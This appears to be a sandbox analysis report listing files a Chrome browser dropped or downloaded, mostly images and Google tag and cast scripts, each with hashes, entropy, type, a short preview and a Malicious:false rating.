                                              SHA-512:C912FF17C210AE848EAB5BA1E79FB1E8ABB8BEEEF13B465D2A08148D272BC6D907538208F7C5A3276096F9C7EA6FC0BB1D410785DF9E517F2FFEE234751D23A8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/13/ede6b29ab48bcd7727bef37740e56b13.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 Z....s...*....>.n.R.&)..6*qp..enP..O.....<..f.....././8Dq..*.._._S.g..Q..z9..|WO...h...F.o8=..o.5........c./...y.....g..[..?.z..c.t?..........O.....o.....z`/.<........;[....A..?}z..Wv...;........P?..U|H.A..'...w.?........u.....11.i....&..<....&.*....u.._..\.....e.lL5.:~.9!..Z'q...J-.2.....K..[^7....=kA%}....&.I.aQ,......[.RK. .CsR...._..h...%r.E.*..N.=.@y[.L.l..&o..#\.orXd....d....TqW...?<g...)0Il.\...3.....+.f...........@.'Q..c}.l,V{&!.^..../9*...q..BR.~...M..j.r.$.5P.C;q....K.+.Ppq.<c.e.q.3....r;T9...RN.xBD}.4..+N(.\....iW..5..../\G..7..............4..s.PW....+.F..4..Z..{B.8.p.O..5..e.=;...ZB.n&.K...)k.W..C.\.E.#.9...}..<J........?B.......?...SZ....=.VV'.....6.......&}.9'...eUBZ4...w.J9.z.y7..f:iK3W..f....J...F&|ei...\..a}....Sc95.D.k..&+...Z.b..f.....~......]b5.v...kO..0..0...;T.m^vM.6w.#?..W.s.6.F..,p...N.g.&...[.....j...h.....e%...R..b...v....`..,.d'S4/..F...?U;.......'@<+y.. .+..-'.$.;E5j$.-.R.|.c..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (7711)
                                              Category:dropped
                                              Size (bytes):326905
                                              Entropy (8bit):5.6062122189450685
                                              Encrypted:false
                                              SSDEEP:6144:04CypmFU7glq04d7z3KsOemve4NMX0fxnPk:dCbW7gQnhDec
                                              MD5:C8A1EFB5AD6963DE5CCEBFC791E6A831
                                              SHA1:72D19944469778F8374661D97462EF893AB9A039
                                              SHA-256:F75FEC0288D87A953B2975ABFE197FCD43F95026476FA0A8FE60FEA928EBFEFC
                                              SHA-512:B94B4BEA9E76010D86799E5E8F470B0C59F15E6EC8D95DD7D7B20ADF503ED6BCF44C6546C36CF4BFC2D1C842794E9DB6AE46C6A3BAAB336B984B2DCE233B4862
                                              Malicious:false
                                              Reputation:low
                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":15,"vtp_value":true,"tag_id":14},{"function":"__ogt_1p_data_v2","priority":15,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetVal
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):6580
                                              Entropy (8bit):5.178055247410916
                                              Encrypted:false
                                              SSDEEP:96:+hAitL5AfkLuAKFLiA9+L1AQHLKAjwIPXA+BtAhaLsAkzl/v/ZJuZq/rgN/OkcqH:sJykjYIh5kl3BwQUFJsVPsudeTg6AY
                                              MD5:981A797B970C59FCE7A627F97777E8F6
                                              SHA1:6A73D7AC6A738832692671328F299B1E7DCAEAD2
                                              SHA-256:B726380545BF22335567FE2BF35C2BBED0353F5BEA910A6EDB4FCEBC50BC11A5
                                              SHA-512:6806F3847D9C1355AA6F3FB81F5B27FB4339314061B7C8E13B4061994D60EA71514C97C2975DE8EC42328969F3D64F1CC20DAC0D6DD92BF737B828EBA406DE8B
                                              Malicious:false
                                              Reputation:low
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="124.143" height="123.198" viewBox="0 0 124.143 123.198">. <defs>. <filter id="Rectangle_Copy_16" x="0" y="0" width="124.143" height="123.198" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03" x="78" y="89.099" width="37" height="24" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>. <feGaussianBlur stdDeviation="3" result="blur-2"/>. <feFlood flood-opacity="0.161"/>. <feComposite operator="in" in2="blur-2"/>. <feComposite in="SourceGraphic"/>. </filter>. <filter id="Point_03_-_color" x="71" y="90.099" width="22" height="22" filterUnits="userSpaceOnUse">. <feOffset dy="3" input="SourceAlpha"/>.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3419
                                              Entropy (8bit):7.907684926063315
                                              Encrypted:false
                                              SSDEEP:96:6PdZaH0f+CAWg7DZLvBcz2bvfATqBlvwqsj6K/CZeWNB2G:2I0f+JWg7DZvBv4g526KfABJ
                                              MD5:19036E1149B076AE227E34BD1DC9143F
                                              SHA1:B01A9B01DB91B7905E967AF069AFEF9556B66BC4
                                              SHA-256:48C81A314A7A48F49BF0D90E13D7691453275612090D8C2F25703E49D275E185
                                              SHA-512:D9094B16E456AD2E52084F5A36DE33311837E9F7CD6517F4154C1608BAF3C885BA7895AA5AB76542EE18859E48EB09AF4C5A388F16788F483B1B86B83BA21884
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...APLTE....................................................B.;y....C......>0....I/...A..B.....?...9'.B8;...E;.:6..IF..../............J...<1.B6......6~..:*.C9....r.G=...P..M......2/......KE......{...........s..Az....51.......73.....3...`.........e^......_X.......SQ..I.id.................|...tl...X...........ts....l.......IDATh..WiW.Z..HN..$!D.B.).@.`..T..%"..Z........9 ...'7.te%.......|......>...._a.&....u...p.;.......@n...!.1......NA.....z.r4.._...2.%L....wI..p...2ON)/H..............(*.x..?H......$...2..........4........."..M3.+H4.i...<.MM...).)....0./b..:..S.........2..b..c....I..$.L...L.D...9".x.|..(.H.o+...$.<.}xx..9.H.,.._?_....H"...?.....`9P.y|..l6.J..z..+.v..!3.f...R(.....p4.....ph.p..h...`..._x..{qu<...Y.d.F.....f+V...0....'+.$....FW.dki+... aOX*.D.~L..N&.R...'.s.....a..Ys7..f...J..i.W......G......O9..._".d.....9%.p}.T;(.T...?...V.....%+....V1...Zs...6.(;.$./.......PymA"J.3..w...j..o8..H..wm.F.Q..M
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4807
                                              Entropy (8bit):7.947883768061024
                                              Encrypted:false
                                              SSDEEP:96://rVeSxBum/8S2INHgv29fNiwr9sYfzm5kukNZvHLxounMMeaAk://JeSnum0SbNgAiwr9dFuKZjHn/lAk
                                              MD5:C6F7B0CF2EA67E205FA0550AED21062A
                                              SHA1:474308A9805FB204A556713A6021F164332A3AC2
                                              SHA-256:741353DCD6ABBD966B1B234A42233882E2DF23BB34A2F73D57A474168F66B65F
                                              SHA-512:7C4E928E81C0ABC788C3BF1D13B61F312478F5166577FCA817AAEEED42A0D74AFA790CAD925904AB435B466B1A87526A4B39709AD55D847D1F6ECFAA464B108D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE........................!.......f.....d...................<............d......$............ce\d....8......V...{......]...*.....>.........]xmwmdl....3..........$...............3......y......8...'q..&..>.............s~%.......R.&.....n..m.....h)...<y#.........*...~ky.3v.............X..k!....;...C...D................x.....h..........^a.....................c....~q..]........C........Y..wR.........Jx.U.!..../..Y.Wz.9vg......4.s..myz6..K....4.|...............d.....IDATh...O.j..k....Vj..#F...\').AI-.I..... f.. ..a8$..!.$&;.~...fr....S...$gg.>.....s?R+++..KK./....yQK...../.YZZ ....Y^~...=....e.._...........]#....<.....K.E|O|5.w;....7.s...ZZ\.%..`.Z....jI..es.....4..Y.6..H1..@.bQ`......|.......i.....o....EQ..C...8...qj*.r%..".O'../!.J$....'...y..9..(@.b.2.q.....-..O...WT..A:...rB:..|.\...".d..rgB.9..M..'.x8Q.-..-b2E ).b....0..a.. x..L,.yI.........e.5t].9M.).S]pW*...." L.a|vT@a......D.v;.so..,...M._=x.J...JR.q.v..!"...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (1143)
                                              Category:downloaded
                                              Size (bytes):4272
                                              Entropy (8bit):5.407649241930215
                                              Encrypted:false
                                              SSDEEP:96:bVcC0LhyRs71268NYZOAx/rfuNfnAZe5PwGNHW:B3qhpRByNPx54GN2
                                              MD5:B427175FA1078775EB792756E7B6D1E7
                                              SHA1:4C55C0233D3D9002B3449C025F97821F8BB8900D
                                              SHA-256:EE147E859AD0F09AA50367974E38AB53E7C7054C4A51D400A7F45B0EB251454F
                                              SHA-512:AF8D384188363378BC99C2E51523E74E1D18BA77D51BFF7647A377A117499421F9E94477E09907925E46DAD0A908B799A616D0B4855FFFF064BA6350815063D3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var l=function(){var a=h,b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},m=this||self,n=/^[\w+/_-]+[=]{0,2}$/,p=null,q=function(a){return(a=a.querySelector&&a.querySelector("script[nonce]"))&&(a=a.nonce||a.getAttribute("nonce"))&&n.test(a)?a:""},r=function(a,b){function e(){}e.prototype=b.prototype;a.i=b.prototype;a.prototype=new e;a.prototype.constructor=a;a.h=function(c,g,k){for(var f=Array(arguments.length-2),d=2;d<arguments.length;d++)f[d-2]=arguments[d];.return b.prototype[g].apply(c,f)}},t=function(a){return a};function u(a){if(Error.captureStackTrace)Error.captureStackTrace(this,u);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))}r(u,Error);u.prototype.name="CustomError";var v=function(a,b){a=a.split("%s");for(var e="",c=a.length-1,g=0;g<c;g++)e+=a[g]+(g<b.length?b[g]:"%s");u.call(this,e+a[c])};r(v,u);v.prototype.name="Asse
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3733
                                              Entropy (8bit):7.927833614906958
                                              Encrypted:false
                                              SSDEEP:48:QvTbrRlogeHtbr1WieyoLokgjFHjN+TOEaOJ0Fl8/CRWXa1aZv5aIz:kRlob1BeyXkgZN+VJ0fCa1aZsS
                                              MD5:20EE10AA4B4CA31954281C3E3188B65C
                                              SHA1:677E00D604944FB1EB2A5E3960C8092291695C60
                                              SHA-256:5C00228A4B411CBE6F96A32706AFE59DCE736E9F02261818233506C65317406C
                                              SHA-512:BBF9C7953B31F3F3AFFF367A5B0372640DF7E9A86CD848CC20C5E8DE8EB742CB42EF3DE2A269E17C86F8576411C8C9F3C22FDB324AF39A40CB6D54865E9397BF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/api.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...>PLTE*+I...DDw....NN,,L......$.r((H!.;...%$7...(*P%$BGE|DEq@B|.IJ...?@s!(F>@k,-W*+@+$I.........21Q.....j..1ECg.PF.KV..r40B$2K.SS...UScL>u..<7?VGH.6&P,.z2 >......44`.C=..../R+................CL.KV..gD#9:....UZDF]).k.[etr.......:.~1je.@M.:J".Y....E<ba|.O_.cH:.se+9~5It@g...mZH.........C.S....K..l......%.h.."..ZM...}f..\.....IDATh..kW.J.....!.p.m..AI..-E.r. ..VDm]}........'\...s.u.tG0$a~........,..&E....$Es9Q......mI.47'F.s...hT~b...E...;......~^.7M.$..N..C.^.......l.....Xz..w[....J..h.......B..O.F&..d..H<........{./.[`..t+.7-..Q..u..a+S......)p.G.=#.0..X!..H.y..-.,....C..C.P..n...D9a..2X.h.2...a......$b..lp,<hDf.D}..\n.. D..3.<...fp .(Y.>...[....-1W.p+.6M.9q...........w.D...,../.c.E,#>."...z..#.*..r.>..<.x.].10.D.pw}.{}.........3...:......-%......c.G.+...B.Y1{..vC...C.BL.....wgw........[...qs4.V...I.A.Gf..i....c...0..."..t.C@....]"....+(1.o..|`,..n.n....u.._\..(Y=m.D..C....... &.r=.!.C..x...B.Z|.r.'.sQ..,S
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):60650
                                              Entropy (8bit):7.996363082625265
                                              Encrypted:true
                                              SSDEEP:1536:9PIAfjAHGV4jTjmxhwj1k05+e8QdQQ5hue01pu3Jt6sI:9PHjX43shwBLvzue80Z4sI
                                              MD5:69AE167C747F345E651D1EC4836D9FA1
                                              SHA1:27A3723AFF1E1ED4BFF337D15F48794A0E280DFA
                                              SHA-256:1D9C571293F766133558928D66EEEECDEB4FEBCB740101BBD3A709D0F0E12226
                                              SHA-512:3056619F23F17C4A9808A6198B825D20C254755E9A743C97B1ECFCB5A9BBEE3CDF258B27C8819A21B5A82504E49EE6A604DCFC74A42B0CFD2D280CCFBEBA430E
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 n...02...*....>.j.R.%.3....p..en..a.&nu;.*.Y..*h._.W...&.b....?....C......f.Ts.../......y."....Q...K4......./Q....?....[.K.?...............d.........o._iO.~...}.?..qt#....;.H.O..../.E.g._.............6s?.....?..........y.g....ymz..O......=}..Ni......T....R..0..4w2.LH..Z...5.9"./.M9....`..*.Z....W..b.T...g...aC.8.u.t...n."..W.......>*..:1i...4.?X)o..*2S3......d............ZHS...4t..........c...$.Y..8.$...o...=.].c...0..Pd.a].... .\.x.J._bU...4.;....5....N.........FDO.'...,2..W....dH..>...(....6......P.....*g..}.LPl.%..b.v.`WR..~4..)).y04OFO..'..R....\:..\.#..~.x.........0.....g.......v.-...^...:.C.q....HLD........4..|.O'df.....6.&.H.T...&../.h..F..z....H.....'.]..I]..x,.[gvB[Z&..h 6!....>...]|.&."HG.^Mu..'h.k1*.vu....,....W.?R.D.t.4:..wQ%K....Kd..y>..`...}.._...k+...!zF4...H;l....[[.......bDM..[..)...(D!.;.l.I.B...n....H..$tzY..[.}~...8.4.6...eW...}......LR.o..."...C....2.....6.U..6}6..K.`t:re......d...enuZ.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:dropped
                                              Size (bytes):69246
                                              Entropy (8bit):7.983299803065322
                                              Encrypted:false
                                              SSDEEP:1536:1d5k81dSGIE+P2McNvkeeUlmWFZyc18rFu8Pwi0WAxwsNVdPo:1Hk81fIE+LcmUl/FZyc1uv0WvV
                                              MD5:0D38DCDD7E472FE7D26A8CD79E79CF5B
                                              SHA1:512FEC365B086AB9FFC5BEADFE2F985BE3B5E1A7
                                              SHA-256:C4FEDFEB3F19F1B8D7DE1A834E938534EDF73CF3DDFC99D0A4E5E6020068AD0C
                                              SHA-512:BD6168B362F03A926F2C522DFD6831F4E5463E1A3005ABAB85B582A1990FD51B7C5E8FA6919785D3B7856828F3F6BCAEE27DA5C52A6C1470391F811351CF6216
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF..........................................................................................................................................................."........................................Y........................!...1A."Qa2q...#BR....Tbr.........$3CS....4Ucst......5D.%d.....................................A........................!1..AQ."aq....2R......#B.3br....C.4S..$............?....(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B.......R....._........<..S{..).T[..a.(Z.5.......<..\.T....._...OB...0..5...T.}....C.W...'....../.z.o...P..T..3.\O.%...j..q?...(.i~Wt(...a.(z.1.........v..........v........a.(../.........v..........v.v..wB.y
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10746
                                              Entropy (8bit):7.967697239386691
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SiFQqC6zd7bs65itcVScDodbRNuA1HUjlZWH7yfTwmwGPcKmP34ce:K0wDiF1hzdnDG6SzuiH7ysmBPcKo4c8T
                                              MD5:02F61F05265112509B647F7722CEFF4D
                                              SHA1:C1C13767B24584A11E14BC79D9F514928E86C26A
                                              SHA-256:93D4492C899DB18DC289197DD7BADD80DA94047CBD303B6F4C67064F50CECE5A
                                              SHA-512:2F51EFC9362A9E22BEE98D6C4B2730B2C2E129ABEFCB26CC01EBC0D8761BAF02DDAFAF720B6CAD87E7D20BF8CC89E4CA4B2B9A671C479A0CCA9D3265859C7D4A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2345)
                                              Category:dropped
                                              Size (bytes):205856
                                              Entropy (8bit):5.5331203936328555
                                              Encrypted:false
                                              SSDEEP:3072:L7ax8eulMYeHSeG001lvol0VQbQwM87NzgOsEemtJeNoZzVJ4s:npmFsli0Ud7DsEemveeZL
                                              MD5:9510680932C4BEA1870EA8313A0608E1
                                              SHA1:1E3885779BFD71F8431267D243FECB691E8E2338
                                              SHA-256:B90020AD0B500781064E97405422BE0721D8A98060DFACD61DA2108EF9FF8D95
                                              SHA-512:8FA1A3B6C5302D09CA5FA0C49F75E8503031B498D874B70C271D4B1EFE482772CA0592779C9725556428808EC8BE4307A0A90448886CBEB2632D423526514EF5
                                              Malicious:false
                                              Reputation:low
                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__cid"}],. "tags":[{"function":"__rep","once_per_event":true,"vtp_containerId":["macro",1],"tag_id":1}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__cid",[46,"a"],[36,[17,[13,[41,"$0"],[3,"$0",["require","getContainerVersion"]],["$0"]],"containerId"]]]. ,[50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. .].,"entities":{."__cid":{"2":true,"4":true,"3":true}.,."__e":{"2":true,"4":true}...}.,"blob":{"1":"1"}.,"permissions":{."__cid":{"read_container_data":{}}.,."__e":{"read_event_data":{"eventDataAccess":"specific","keyPatterns":["event"]}}...}....,"security_groups":{."google":[."__cid".,."__e"..]...}....};.....var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{d
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):2002
                                              Entropy (8bit):7.741215729148641
                                              Encrypted:false
                                              SSDEEP:48:a+dkJpd6JwO2KaCjY2MFgCzIp6aTqvSQmfrk8f9:mOJg27CzIQaTwSHfoW9
                                              MD5:64357859AAFB0BB359A3043EC7E6218D
                                              SHA1:66C8A7F5A8D3FE890DC056F8D56E07A573D7FB1D
                                              SHA-256:884C71ECA7049C730EF38540468D5543CB00993C1D23C3EB56F9FB808F0748B6
                                              SHA-512:0B2575A677D4BF6D80F84C6456DF6394149951F7F583CA7F0308F57424DD1D1BC70F06047245F75555BB785AE3712331B19F45CFE57F56285E3CE518D8CC00CB
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...tIDATx.....S..O..Hn(.wy...C)e..)...HB.a.G.&1..(D/%I.H.1..*5..P.\..C.H.^.....l.......v.|?3....g......~.5...............................................H.C..@..p..I..2.I;....f...I.D..J......H.=.UB.......9isH].I.)..M.q.9.....b..!...........,.eiZ../.,D.9.r.......*.Eh.M...=J.^.!.@..P.).u..S.P.`.~.m<..S.....GD.M...v...UH_88....y]#=...F..Ny..|u.&.S..J.....i.C;.N.>.^.g....z.Gg{.....|...-OG..C..k.Qz}...-..(.k...}.t.a......^.v.W.....y].!.U....2.5..otH;...Q._F...}...O.a......uvx.9..r~\c..C...i...c.O..! ....$%.l-...z.q.....YH..e;...5I....c.r...XK.K~.#.xc%;.6/$M....d.8P...z..Z3H5.6...2M....r.IZ%..A.+.(9Z=.'.3....C...>..n..>.!....*u...".p.g~0.&I.m+;>.....R."q....d..0..C&3..Q.Y...rN..\_.......{..Q.tp.d:..l..:z...RfHTg...SrV.R.(b...5../7l.L....IO)e.......6..`..O.2...f9./...o...-Y:.y.~.....Uz.m)...b.....u..........H.).=l..b...,.f..0.,.x....{.7E.,.8...1S.T6.....GFa.L.....~....=.O..$.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10077
                                              Entropy (8bit):7.960846075105278
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SvuqIHv7B7YY4zhYq4tM/ClUkJa50sb9F8a:K0wDvurHvCY4zyG/R6a50Yz
                                              MD5:F796804F132E3B8FB104CD6FBFEDC5A7
                                              SHA1:31339E1F22E670A65A699E58D1C2F24E29F61B4B
                                              SHA-256:857825203EDA4036EA086113A46F51DEADD89846FC157F933C23B7ECA2D918B5
                                              SHA-512:2FB61AAA0694924F781A79393D73E3032B6EF868168395ADC6BBE0FCA569D95C35648DC52BAC66BEF77CD27EC98135118CD60C64CCA9B259F172995A0F20CA0F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):8963
                                              Entropy (8bit):7.9350337778513085
                                              Encrypted:false
                                              SSDEEP:192:G0pI4Iw6I0UAMXaVssHQIGKT0cQcgqRbcARegfvjSbXogUeANNW:PpI4Iw4PMXaVvHQvEgqRQMfvjnNg
                                              MD5:527DDDD0C59B89C8138C1409D576FAFC
                                              SHA1:EFC6D7B1346DEA92EBEF4C7E81B6053E5286F3E2
                                              SHA-256:A89C5D24B3BD329D036FF561FAAB33A6FCE8A094F8F0AF7C64578A670FB4FDC3
                                              SHA-512:99E042E2001C2E8D74D512841CC01D15FD7E2190CE2AB1E7105C9D83E17CDF4C2EAF79E1D29550DBB0F8A9C0760AEF0EAD98997D617346AB77B4CFFE3944A90F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:61D9DBF9D7D211EDBBB3B8489115637F" xmpMM:DocumentID="xmp.did:61D9DBFAD7D211EDBBB3B8489115637F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:61D9DBF7D7D211EDBBB3B8489115637F" stRef:documentID="xmp.did:61D9DBF8D7D211EDBBB3B8489115637F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......sIDATx..}.....79o.A..V..d...A.&..\.....L...:.].......e.....#`.....d..0"(..+...yW.&......gv....sA;..j..t..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):5774
                                              Entropy (8bit):7.387975124118672
                                              Encrypted:false
                                              SSDEEP:96:RNBf33Pf3ff33Pf3dkWCfbK32/Gq0nBQt1nUeFd8XJ0LYC96+9hH3FLbuvHl+Z7:rBnnn6fWmKnuZFe5iv9/H30vwp
                                              MD5:4F658B9A7D067DE5238644B78D8D09CC
                                              SHA1:A669BB818ABF638D4B14347BAF79D8C45D671CFE
                                              SHA-256:B9874A9D2687074F9C22A8D2276339B90388C8DFCACD5A4F1F87A563FCBFC8ED
                                              SHA-512:7E3FB810A90D38134E783246347352EA5FE3E47FB3798872610F86B1E0751B7D69562B4DF9F3DD1B5256C32FCE06531D61B017D5FC917136DEA17C591103755C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/apple-logo.png
                                              Preview:.PNG........IHDR..............$.....sBIT.....O.....pHYs..7/..7/.6u......tEXtSoftware.www.inkscape.org..<.....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#......tRNS................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 155x80, components 3
                                              Category:dropped
                                              Size (bytes):10249
                                              Entropy (8bit):7.948034628681043
                                              Encrypted:false
                                              SSDEEP:192:ExpceXqNmVbCugY0KeD0fcdT/XQo6P/wl+7l1nzQkwwQ8oQrjgDcwdiALR4:ExdXimFM7KeofcdjQykzQRwQ2r0Iwv4
                                              MD5:7E1F653095BB20EC681506852DA17D05
                                              SHA1:63CE30DB87791E71FA029B9533192514ADBAB7ED
                                              SHA-256:F19FCF86A7DCD3D4A0231A9AFC795C98D34433C8259A2876C5310C1177B0279D
